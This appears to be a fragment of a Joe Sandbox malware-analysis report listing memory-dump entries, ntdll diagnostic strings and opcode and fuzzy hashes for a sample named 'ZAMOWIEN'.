                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                            • API String ID: 0-1596344177
                                                                            • Opcode ID: baa3ee1358384a509a8fd933eda57b6ada0eb5b67c1685c805385bdc8c81a581
                                                                            • Instruction ID: 61f642d3327bf41fada5f2c73db4cb26748abc21ba233c34fbeebb502331fb2e
                                                                            • Opcode Fuzzy Hash: baa3ee1358384a509a8fd933eda57b6ada0eb5b67c1685c805385bdc8c81a581
                                                                            • Instruction Fuzzy Hash: 46518B34A08215EFEB08CF68C484B6ABBB1FF45714F158198D854AF342EB72E942CB90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                            • API String ID: 0-1151232445
                                                                            • Opcode ID: 5af4a81763dfce8ac854d551e996d31958d5f8aa576c7639f4e9234c18e05442
                                                                            • Instruction ID: 441f9b0ed38f8d9a46307a59412164001b2ccbab18f9e549df88592c953e8570
                                                                            • Opcode Fuzzy Hash: 5af4a81763dfce8ac854d551e996d31958d5f8aa576c7639f4e9234c18e05442
                                                                            • Instruction Fuzzy Hash: C641E4F92003448FEB15CB58C4A1BE977E1BB0138CF5445ADD84A8FA86DF74D486CB61
                                                                            Strings
                                                                            • LdrpAllocateTls, xrefs: 32861B40
                                                                            • minkernel\ntdll\ldrtls.c, xrefs: 32861B4A
                                                                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 32861B39
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                            • API String ID: 0-4274184382
                                                                            • Opcode ID: cf225b18defd0c2900a3da8644984bd131c3e25ae05434160ee76ce0a868bbda
                                                                            • Instruction ID: b241db5c8f411258317fc1504b2b6e22b72555fa466db0c63399db384f990419
                                                                            • Opcode Fuzzy Hash: cf225b18defd0c2900a3da8644984bd131c3e25ae05434160ee76ce0a868bbda
                                                                            • Instruction Fuzzy Hash: 32416DB9A01609EFDB15CFA8C841BADBBF5FF48708F108519E415A7351DB75A841CFA0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-964947082
                                                                            • Opcode ID: 5168d65c61fed3df99ae65d2b6c864ab19f6414a920c7081f9c2bc2cca6174a8
                                                                            • Instruction ID: fa39a5b766959e3fbf6ad47afc5583df3306a8d134e99ce18fd3b07b0a2fd7d4
                                                                            • Opcode Fuzzy Hash: 5168d65c61fed3df99ae65d2b6c864ab19f6414a920c7081f9c2bc2cca6174a8
                                                                            • Instruction Fuzzy Hash: 524103B9A13258EFD710CF55C8A0F6A3BB5FB04354F400429E9199B280DF75D9C4CB60
                                                                            Strings
                                                                            • SXS: %s() passed the empty activation context data, xrefs: 328629FE
                                                                            • Actx , xrefs: 328233AC
                                                                            • RtlCreateActivationContext, xrefs: 328629F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                            • API String ID: 0-859632880
                                                                            • Opcode ID: 34892d9fc1bf8ec7c1c4bdf71ba0e3d099de684170be7cf1a647ad3be2d9626c
                                                                            • Instruction ID: 1547e5919e875c2647e7a4d3e6843034e29e453b7800ac0ab5f05b4c67c7eaef
                                                                            • Opcode Fuzzy Hash: 34892d9fc1bf8ec7c1c4bdf71ba0e3d099de684170be7cf1a647ad3be2d9626c
                                                                            • Instruction Fuzzy Hash: 5531773A2003059FEB16CF18C890F9637A4FF54759F0584A9ED08EF285CBB5D891CB90
                                                                            Strings
                                                                            • GlobalFlag, xrefs: 3287B68F
                                                                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3287B632
                                                                            • @, xrefs: 3287B670
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                            • API String ID: 0-4192008846
                                                                            • Opcode ID: 437892f20bfa36fb4a3c4f353f681c4c32335a41ac28107858cfcf6f62f8a6a6
                                                                            • Instruction ID: ebc3b33948d72acb7c7f09f2dab82b57c80aa02a097587a873a91a1d1aa89934
                                                                            • Opcode Fuzzy Hash: 437892f20bfa36fb4a3c4f353f681c4c32335a41ac28107858cfcf6f62f8a6a6
                                                                            • Instruction Fuzzy Hash: 70315CB9D00209AFDB01DFA9CC80AEEBBB9FF44744F400469E605A7241DB749E04CBA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                                            • API String ID: 0-1050206962
                                                                            • Opcode ID: ec9dc9a42aa3d4bf647cceecc06dcdaa02831cb49f87cd8a39894ec198046dd4
                                                                            • Instruction ID: 3cbdee916ccb1eec14b4c9a2f2b05057affdf28211e415c8a6be6146761d77a1
                                                                            • Opcode Fuzzy Hash: ec9dc9a42aa3d4bf647cceecc06dcdaa02831cb49f87cd8a39894ec198046dd4
                                                                            • Instruction Fuzzy Hash: 37316DBA901219AFEB028F94CC84EDEBBBDEB48B54F414465EA14A7210D7789D048BA0
                                                                            Strings
                                                                            • DLL "%wZ" has TLS information at %p, xrefs: 32861A40
                                                                            • LdrpInitializeTls, xrefs: 32861A47
                                                                            • minkernel\ntdll\ldrtls.c, xrefs: 32861A51
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                            • API String ID: 0-931879808
                                                                            • Opcode ID: 74a6ef5e3dc450cddd7171e05a937493f23998d9bd6643e1a2533b71d55320a5
                                                                            • Instruction ID: 81bab840758d7a45f6d31f4a7e3cdbc9bcbaa19e12546beea700abbe85c3d047
                                                                            • Opcode Fuzzy Hash: 74a6ef5e3dc450cddd7171e05a937493f23998d9bd6643e1a2533b71d55320a5
                                                                            • Instruction Fuzzy Hash: 8D31F579A51304FFF7108B48CC85F6E77B8BB40B48F140529E905BB182DBB4ED818BA0
                                                                            Strings
                                                                            • BuildLabEx, xrefs: 3283130F
                                                                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3283127B
                                                                            • @, xrefs: 328312A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                            • API String ID: 0-3051831665
                                                                            • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                            • Instruction ID: 09a18d4b7f7c1906cfb26cc9ddb426407258eb31a39854333ee9d40f2c79c84a
                                                                            • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                            • Instruction Fuzzy Hash: 7731927D901618EFDF129B99CD40EEEBBB9EB44B54F004025EA14A7160DB74D905CB90
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: RtlValidateHeap
                                                                            • API String ID: 3446177414-1797218451
                                                                            • Opcode ID: 445b999f72ca7989a78b09e2c2edf14e014bdb23ff6357fb4c785ea5677ca0d3
                                                                            • Instruction ID: 7348ecb6aa456015eec0c5109f8eb3f7b0af2e4ca5453049b2e8e29f025701e7
                                                                            • Opcode Fuzzy Hash: 445b999f72ca7989a78b09e2c2edf14e014bdb23ff6357fb4c785ea5677ca0d3
                                                                            • Instruction Fuzzy Hash: 6C41D57AA013599FDB06CFA8C4A07EDB7B2BF41754F048659D8666F280CF349905DBA0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: kLsE
                                                                            • API String ID: 3446177414-3058123920
                                                                            • Opcode ID: 1935306067d08b009772b156a5374c0650bd45eefb3cdd12df776bc9913f5a72
                                                                            • Instruction ID: 3c2d1d9fd92bd67b3b4b7a2d1e9ab7f45f78468a061315e5ce69366c31df41b3
                                                                            • Opcode Fuzzy Hash: 1935306067d08b009772b156a5374c0650bd45eefb3cdd12df776bc9913f5a72
                                                                            • Instruction Fuzzy Hash: 664147F95A2361C7E7129F64C884BA93BA0FB40778F540919EC64AA1D1CBB558C3CBA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$@
                                                                            • API String ID: 0-149943524
                                                                            • Opcode ID: d1defa39f7de2c5fadb6757f01db21aeb657952b9417b77a0028494a79225025
                                                                            • Instruction ID: e74b6e2b4fbdc1a13667d10a90a179fb587df727a2afdf33469f13df9ee5926c
                                                                            • Opcode Fuzzy Hash: d1defa39f7de2c5fadb6757f01db21aeb657952b9417b77a0028494a79225025
                                                                            • Instruction Fuzzy Hash: 4D329CBC509311AFE7248F14C89076BB7E1FF89748F50891EE99997290EB78D844CF62
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: 0c375095270d0e9f4e2d5c3593db0b365cf8ec3a8e5fc7f27b2bf6f91930c558
                                                                            • Instruction ID: fefcb02a4f60745f19a30268dd8caca082729cbd9b40d275ce6dd45ee1c6ef8a
                                                                            • Opcode Fuzzy Hash: 0c375095270d0e9f4e2d5c3593db0b365cf8ec3a8e5fc7f27b2bf6f91930c558
                                                                            • Instruction Fuzzy Hash: 5F31AE39205B06FFE7558B24CD80B89F7A6FF48394F505025E9145BB50DBB5E821CBE0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$AddD
                                                                            • API String ID: 0-2525844869
                                                                            • Opcode ID: 282c9ef0fe654bb47adb283095b79245c0574da20b0dad40476b21ecb565ca09
                                                                            • Instruction ID: 1b18e72ebf3c5143c09e887dd77777fc5ef9bfb7cccc484df8f8fb952e985082
                                                                            • Opcode Fuzzy Hash: 282c9ef0fe654bb47adb283095b79245c0574da20b0dad40476b21ecb565ca09
                                                                            • Instruction Fuzzy Hash: BDA16DBA514344AFE315CB58C845BABB7EDFF84B04F504A2EF99487150E7B0E948CB62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $$$
                                                                            • API String ID: 3446177414-233714265
                                                                            • Opcode ID: 179599105356db07e8644f5002d6c55718d41028aaf7dd33bbaa13727261d0dd
                                                                            • Instruction ID: e27df047f2622db6613486e0e5afe85e74f6deea4b1855d5b4f033f3978b2fcd
                                                                            • Opcode Fuzzy Hash: 179599105356db07e8644f5002d6c55718d41028aaf7dd33bbaa13727261d0dd
                                                                            • Instruction Fuzzy Hash: B8618D79A05749EFEB20CFA8C980B99B7B1FF44708F10C469D5196B680CFB4A985CF94
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                            • API String ID: 0-118005554
                                                                            • Opcode ID: 9e42df945b9d5aebdb5f05deea575c6ce19ebe5ab67b7fc2df45848fedeb125d
                                                                            • Instruction ID: 75447d6bc238347a641bf257a84a9b3e50322d19d36ae585548763de7ac8febd
                                                                            • Opcode Fuzzy Hash: 9e42df945b9d5aebdb5f05deea575c6ce19ebe5ab67b7fc2df45848fedeb125d
                                                                            • Instruction Fuzzy Hash: 9B31BA792097819FD301CB2DD884B1AB7E4EF84758F040869FCA8CB392EB74D905CB92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .Local\$@
                                                                            • API String ID: 0-380025441
                                                                            • Opcode ID: 2cefb61d944b894599b357a8ea3f47a8bff76fdc08b1c1d2b854cdf935ba0ffc
                                                                            • Instruction ID: 54bb9352528c1015705ec49c8d90e391b0a8903b83064c434b0265d21eb310ee
                                                                            • Opcode Fuzzy Hash: 2cefb61d944b894599b357a8ea3f47a8bff76fdc08b1c1d2b854cdf935ba0ffc
                                                                            • Instruction Fuzzy Hash: 5E31A4BA509704AFE311CF28D994A5BBBE8FBC4754F44092EF99483250DA34DE44CB92
                                                                            Strings
                                                                            • RtlpInitializeAssemblyStorageMap, xrefs: 32862A90
                                                                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 32862A95
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                            • API String ID: 0-2653619699
                                                                            • Opcode ID: 9b2bd0ac353b736ae09aa95d3f31bf426f788c9b26abe552d2d661bbddebcdff
                                                                            • Instruction ID: 8ffc74ddef4c6a62f2a5c5c33cee0ed085bf366179fc1c982b960a27bfffb2fd
                                                                            • Opcode Fuzzy Hash: 9b2bd0ac353b736ae09aa95d3f31bf426f788c9b26abe552d2d661bbddebcdff
                                                                            • Instruction Fuzzy Hash: FC112C7AB00314BFF7158A4C9D41F6B77A99BA4B58F14C0A97A04EF284DAB9CD4086A0
                                                                            APIs
                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 328C3356
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: CallFilterFunc@8
                                                                            • String ID:
                                                                            • API String ID: 4062629308-0
                                                                            • Opcode ID: 0e56ce69715b6f40e54c6584dfce27db8b0295e5baecfc7f5742173ab8645abe
                                                                            • Instruction ID: 5c0855af07daba299ccabdab19776bedd96fc538d38e73bed2c1beb64d90faca
                                                                            • Opcode Fuzzy Hash: 0e56ce69715b6f40e54c6584dfce27db8b0295e5baecfc7f5742173ab8645abe
                                                                            • Instruction Fuzzy Hash: 7DC113B99017698FDB24CF1AC884699FBF1FF88314F5081AED54DA7254DB34AA82CF40
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: a67c980c1fd9b114ca02743689e59d264d7ad9243760f6bb70abaf6467bec949
                                                                            • Instruction ID: ff80a4631e0736fe3d3be5318b8c4411235fd416e2b2a61969afd326a29784bd
                                                                            • Opcode Fuzzy Hash: a67c980c1fd9b114ca02743689e59d264d7ad9243760f6bb70abaf6467bec949
                                                                            • Instruction Fuzzy Hash: E0B112B96093409FD354CF28C480A6ABBE1BF88708F54896EE899DB351DB71E945CB42
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fbcb03ac0e87ae307fa8e7b6a7e909236ebdac2031a3e79f2444cb2e372af919
                                                                            • Instruction ID: fce9b586ab91b4dc74647d52ea1198fe1ee7c87b17a734f66d8d956daa8e98fb
                                                                            • Opcode Fuzzy Hash: fbcb03ac0e87ae307fa8e7b6a7e909236ebdac2031a3e79f2444cb2e372af919
                                                                            • Instruction Fuzzy Hash: D1A19D75A08341EFD314CF28C480A5ABBE6FF88744F20492DE9949B350EB71E945CF92
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3f2214b6919dded2a1e18cabeee7bbccf9b2de5f0d5d5cfcfcccb8677ceb47d4
                                                                            • Instruction ID: 81ea602cfc1c2cdf7badbfa427fb59a026e3afdd1effc9356f19e7e2e4f5961c
                                                                            • Opcode Fuzzy Hash: 3f2214b6919dded2a1e18cabeee7bbccf9b2de5f0d5d5cfcfcccb8677ceb47d4
                                                                            • Instruction Fuzzy Hash: B7614179A05606EFDB48CF68C480BADFBB6BF48340F14816AD419AB340DB75A941CB90
                                                                            Memory Dump Source
